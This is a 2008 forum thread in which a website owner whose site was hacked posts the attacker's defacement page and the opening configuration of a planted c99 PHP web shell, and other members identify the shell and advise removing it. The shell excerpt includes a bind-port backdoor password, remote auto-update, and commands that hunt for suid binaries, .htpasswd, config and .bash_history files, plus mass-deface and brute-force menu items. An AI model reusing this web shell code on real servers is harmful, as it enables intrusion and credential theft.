My Site been hacked

**ijo** · 09-29-2008, 02:03 PM

Hi guys,
Some asshole had hacked my website here is the scriptes in inserted inside my site.
<head>
<style>

</style>
<title> تم الدعس من قبل الهاكر saoucha </title>
</head>

<body bgcolor="#000000" background="">

 
 

 

 

<img border="0" src="http://www.sudanesespace.com/files/imgbas_hacker2007.gif" width="350" height="350">
 


((  Hacked
by 
 ))
 

الهاكر saoucha

 

NNNNNN



NNNNNN
 


اترك 
لنا
الفعل 
وسنترك
لك 
الكلام

<img border="0" src="" width="576" height="29">



الحماية 
صنعت 
من 
اجل 
الاختراق 
فلا 
يأس 
مع الحياة 

<script language="JavaScript1.2">
if (document.all)
document.body.style.cssText="border:25 ridge green"
</script>



 ;

<O:P></O:P><O:P></O:P></TD>



 
 



<img border="0" src="http://www.sudanesespace.com/files/hacked28hiax0.png" width="350" height="350">
 


 AdMiN

جرت
قلم وامحيك


<a href="mailto:">
hakokaka@hotmail.com</a>



<a href="">
</a>








<a href="mailto:">
</a>
 



mail

<a href="mailto:HaKoKaKa@HOTMAIL.COM">
</a><a href="mailto:"></a>
 




HaCkeR aLGeRiaN
m     
 

<a href="http://www.startimess2.my3gb.com/f/">

http://www.startimess2.my3gb.com/f/ 
 </a>
 

 

 

 

 

<STYLE>
BODY {
scrollbar-3dlight-color: #008000;
scrollbar-arrow-color: #008000;
scrollbar-darkshadow-color: #008000;
scrollbar-face-color: #000000;
scrollbar-highlight-color: #008000;
scrollbar-shadow-color: #008000;
scrollbar-track-color: #000033}
</STYLE>



<EMBED name=video
pluginspage=http://www.real.com/player/ src=http://6aye.com/jihaad.ram
width=165 height=62 type=audio/x-pn-realaudio-plugin loop="true"
autostart="true" nojava="true" controls="ControlPanel,StatusBar"
maintainaspect="false" true hidden>

<BODY onLoad="alert(' StOoOp HaCkEd By: الهاكر saoucha
');" onUnload="alert('SeE YoU');">

<script>

//Pop-under window II- By JaBrOt HaCkEr
//Credit notice must stay intact for use
//Visit http://javascriptkit.com for this script
// Visit h/ for more code
// Translated By /

//
var popunder=new Array()
popunder[0]=""
//specify popunder window features //
//set 1 to enable a particular feature, 0 to disable
var winfeatures="width=600,height=300,scroll bars=0,resizable=0,toolbar=0,location=0, menubar=0,status=0,directories=0"

//Pop-under only once per browser session? (0=no, 1=yes)
//Specifying 0 will cause popunder to load every time page is loaded
var once_per_session=0

/// ا/////

function get_cookie(Name) {
var search = Name + "="
var returnvalue = "";
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length
// set index of beginning of value
end = document.cookie.indexOf(";", offset);
// set index of end of cookie value
if (end == -1)
end = document.cookie.length;
returnvalue=unescape(document.cookie.sub string(offset, end))
}
}
return returnvalue;
}

function loadornot(){
if (get_cookie('popunder')==''){
loadpopunder()
document.cookie="popunder=yes"
}
}

function loadpopunder(){
win2=window.open(popunder[Math.floor(Math.random()*(popunder.lengt h))],"",winfeatures)
win2.blur()
window.focus()
}

if (once_per_session==0)
loadpopunder()
else
loadornot()

</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-231925-2");
pageTracker._initData();
pageTracker._trackPageview();

</script>


<script language="javascript" type="text/javascript">

</script>



<script type="text/javascript" src="http://static.jeeranservices.net/j/memberpages/footer.js">
</script>

**Pawel Kowalski** · 09-29-2008, 02:14 PM

What php (or other) scripts were you using?

**ijo** · 09-29-2008, 03:42 PM

Hi Pawel,
Thanks for quick reply.My site been down for couple of days now, the hacker is using my site to collect Bank of America credit card information from clients.
My site is a social network. To make the problem worse am not really familiar with the scripts. The version of script am using is Social Media v2.0.0(by Nathan Harber of www.entertainmentscripts.com). Am using Php4,
Mind telling me more about ( miscinfo.php) am kind of suspicious of some codes:
<?php
$shver = "1.0 beta (4.02.2005)"; //Current version
//CONFIGURATION
$surl = "?"; //link to this script, INCLUDE "?".
$rootdir = "./"; //e.g "c:", "/","/home"
$timelimit = 60; //limit of execution this script (seconds).

//Authentication

$login = false; //login
//DON'T FOGOT ABOUT CHANGE PASSWORD!!!
$pass = "team"; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
//$login = false; //turn off authentication

$autoupdate = true; //Automatic updating?

$updatenow = false; //If true, update now

$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server

$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod

$filestealth = 1; //if true, don't change modify&access-time

$donated_html = ""; //If you publish free shell and you wish
//add link to your site or any other information,
//put here your html.
$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.

$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")

$curdir = "./"; //start directory

$tmpdir = dirname(__FILE__); //Directory for tempory files

// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3", ...),
// "{action2}"=>array("ext1","ext2","ext3", ...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js ","bak","doc","log","sfc","cfg"),
"exe"=>array("sh","install","bat","cmd") ,
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4 ","inc","tcl","h","c","cpp"),
"img"=>array("gif","png","jpeg","jpg","j pe","bmp","ico","tif","tiff","avi","mpg" ,"mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src ","lnk","zip","rar")
);

$hexdump_lines = 8; // lines in hex preview file
$hexdump_rows = 24; // 16, 24 or 32 bytes in one line

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

$bindport_pass = "c99"; // default password for binding
$bindport_port = "11457"; // default port for binding

/* Command-aliases system */
$aliases = array();
$aliases[] = array("-----------------------------------------------------------", "ls -la");
/* поиск на сервере всех файлов с suid битом */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
/* поиск в текущей директории всех файлов с suid битом */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
/* поиск на сервере всех файлов с sgid битом */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
/* поиск в текущей директории всех файлов с sgid битом */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
/* поиск на сервере файлов config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
/* поиск на сервере файлов config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
/* поиск в текущей директории файлов config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
/* поиск на сервере всех директорий и файлов доступных на запись для всех */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
/* поиск в текущей директории всех директорий и файлов доступных на запись для всех */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
/* поиск на сервере файлов service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
/* поиск в текущей директории файлов service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
/* поиск на сервере файлов .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
/* поиск в текущей директории файлов .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
/* поиск всех файлов .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
/* поиск в текущей директории файлов .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
/* поиск всех файлов .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
/* поиск в текущей директории файлов .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
/* вывод списка атрибутов файлов на файловой системе ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
/* просмотр открытых портов */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");

$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
$sess_cookie = "c99shvars"; // cookie-variable name

if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand( 1,999).rand(1,999));}
$sess_file = $tmpdir."c99shvars_".$sid.".tmp";

$usefsbuff = true; //Buffer-function
$copy_unset = false; //Delete copied files from buffer after pasting

//Quick launch
$quicklaunch = array();
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
$quicklaunch[] = array("Mass deface",$surl."act=massdeface&d=%d");
$quicklaunch[] = array("Bind",$surl."act=bind&d=%d");
$quicklaunch[] = array("Processes",$surl."act=ps_aux&d=%d");
$quicklaunch[] = array("FTP Quick brute",$surl."act=ftpquickbrute&d=%d");
$quicklaunch[] = array("LSA",$surl."act=lsa&d=%d");
$quicklaunch[] = array("SQL",$surl."act=sql&d=%d");
$quicklaunch[] = array("PHP-code",$surl."act=eval&d=%d");
$quicklaunch[] = array("PHP-info",$surl."act=phpinfo\" target=\"blank=\"_target");
$quicklaunch[] = array("Self remove",$surl."act=selfremove");
$quicklaunch[] = array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()");

**ijo** · 09-29-2008, 03:44 PM

Hi Pawel,
I just copy paste some of the codes
Thanks in advance
Ijo

**Vin DSL** · 09-29-2008, 03:49 PM

Originally Posted by ijo

My site been down for couple of days now, the hacker is using my site to collect Bank of America credit card information from clients.

Looks like it's been going on for a while...

http://groups.google.com/group/news....5104641cdc75be

Have you contacted Tech Support?

**ijo** · 09-29-2008, 03:58 PM

Hi Vin DSL,
Sup? I contacted tech-support am told them to disable the site till the problem is solved.

**Vin DSL** · 09-29-2008, 05:20 PM

~Cool

The only way I know of finding out how the perps got into your site is by investigating your 'logs' line-by-line.

**homoludens** · 09-29-2008, 06:04 PM

Mind telling me more about ( miscinfo.php) am kind of suspicious of some codes:

It looks like it's the c99sh shell, which is used to backdoor websites.

Is that file part of the code you originally downloaded? That might sound like a stupid question, so I offer this forum post as a cross reference.

**ijo** · 09-29-2008, 08:00 PM

It's c99shell but do i have to delete it ?
Any body familiar miscinfo.php?

**homoludens** · 09-29-2008, 08:06 PM

It's c99shell but do i have to delete it ?

Yes. This very minute.

Was it part of the original code for Social Media?

**ijo** · 09-29-2008, 08:27 PM

I think so

**ijo** · 09-29-2008, 08:28 PM

But it seem like the hacker insert some codes in it

**ijo** · 09-29-2008, 08:46 PM

hey homoluden!

**ijo** · 09-29-2008, 08:47 PM

am gonna copy paste the code here mind if you go through it

**homoludens** · 09-29-2008, 08:54 PM

What do you want me to look at? c99shell or the original?

LinkBack

Thread Tools

Display

My Site been hacked

Bookmarks

Bookmarks

Posting Permissions